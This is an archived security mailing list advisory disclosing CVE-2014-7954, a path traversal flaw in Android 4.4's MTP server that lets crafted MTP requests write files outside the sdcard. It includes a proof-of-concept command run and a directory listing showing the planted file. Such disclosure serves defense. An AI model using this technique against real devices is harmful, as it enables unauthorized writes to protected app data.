lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 17 Apr 2015 16:30:22 +0200
From: Imre RAD <>
Subject: CVE-2014-7954 MTP path traversal vulnerability in Android

MTP path traversal vulnerability in Android 4.4

doSendObjectInfo() method of the MtpServer class implemented in
frameworks/av/media/mtp/MtpServer.cpp does not validate the name
parameter of the incoming MTP packet at all.

It is possible to upload files outside of the sdcard using a specially
crafted MTP request:

root@...tpc:~/mtp-test# ./mtp-mysend sdf.txt \
libmtp version: 1.1.3

Device 0 (VID=18d1 and PID=4e42) is UNKNOWN.
Please report this VID/PID and the device model to the libmtp
development team
Android device detected, assigning default bug flags
Sending sdf.txt as
Sending file...
Progress: 25 of 25 (100%)
New file ID: 203

The file is written by the process

root@...uper:/data/data/ # ls -la
ls -la
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 cache
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:07 databases
lrwxrwxrwx install  install           2014-07-22 01:05 lib ->
-rw-rw-r-- u0_a6    media_rw       13 2014-09-24 01:36 sdf.txt
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 shared_prefs

Tested on:     Android 4.4.4
Reported on:   2014-09-26
Assigned CVE:  CVE-2014-7954
Discovered by: Imre Rad / Search-Lab Ltd.

Powered by blists - more mailing lists